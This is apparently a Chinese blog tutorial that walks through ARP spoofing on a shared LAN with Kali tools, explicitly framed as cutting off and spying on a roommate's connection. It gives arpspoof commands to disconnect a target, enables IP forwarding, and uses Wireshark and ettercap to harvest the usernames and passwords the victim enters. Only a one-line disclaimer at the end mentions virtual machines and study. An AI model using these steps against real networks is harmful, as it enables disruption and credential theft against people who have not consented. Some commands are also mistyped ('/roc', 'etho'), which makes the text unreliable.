一、前提准备
1、在kali 中打开权限用户
输入 sudo su 即可
之后检查是否有网络连接:(例)
ping www.baidu.com
显示如图所示证明有网络连接
clear 清屏
2、检查列表更新
apt-get update
等待更新结束即可
3、软件安装
输入: apt-get install dsniff
注释:Dsniff 是一个著名的网络嗅探工具包。
dsniff 工具介绍
纯粹被动地进行网络活动监视的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、 webspy 针对 SSH 和 SSL 的 MITM(Man-In-The-Middle)“攻击”工具,包括 sshmitm 和 webmitm 发起主动欺骗的工具,包括:arpspoof、dnsspoof、macof 其它工具,包括 tcpkill、tcpnice
dsniff 是一个密码侦测工具,他能够自动分析端口上收到的某些协议的数据包,并获取相应 的密码。 dnisff 支持的协议有 FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC,
AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL。
之后输入y等待安装,如图
4、应用dsniff中的 arpspoof 软件
输入: arpspoof -h 查看帮助
如图:
二、开始让舍友断网(仅限同一网络(局域网))
1、扫描舍友的IP及关网
(1)输入: arp-scan
显示出网段
在kali中出入 ip add 查看本机网段
之后根据上图给出的网段范围输入
arp-scan 192.168.10.1-192.168.10.254
可以扫出ip地址,但不清楚是那台物理主机的
再介绍一款扫描软件
(2)、nbtscan
输入: nbtscan -h 查看帮助
根据提示输入:
nbtscan -r
这时候可以清晰的看到对方的物理主机
查看网关
fping -g 本机IP地址/24
2、开始攻击
输入
arpspoof -i eth0 -t IP地址+网关
就ok了。
三、监看室友网络
1、开启路由
cat /roc/sys/net/ipv4/ip_forward
文件
默认为0,此时路由关闭
etho 1 > /roc/sys/net/ipv4/ip_forward
开启路由
2、开始嗅探
输入: ettercap -h 查看帮助
帮助很多我们用到的也就有其中的几个
例
我们还可以用 wireshark 软件进行嗅探
在kali中的09位置
选择 eth0 打开
在另一台虚拟机中登陆一些需要输入用户名、密码的后台
例 在百度搜 inurl:login (谷歌黑客)
之后随便输入一个用户和密码,如:
admin 123456
找到post请求
右击打开找到图示位置点击
此时我们可以已找到另一台物理主机的浏览情况
这时候看着太乱回到上面所说的我们可以用 ettercap 直接查看用户名和密码
输入: ettercap -Tq -i eth0
这时候我们可以清晰的看到另一台物理主机所在网站地址输入的用户名和密码
四、简单攻击及其原理
转自沙漠一只雕得儿得儿
五、注意
本次模拟arp欺骗攻击均在虚拟机完成仅供学习参考不得非法攻击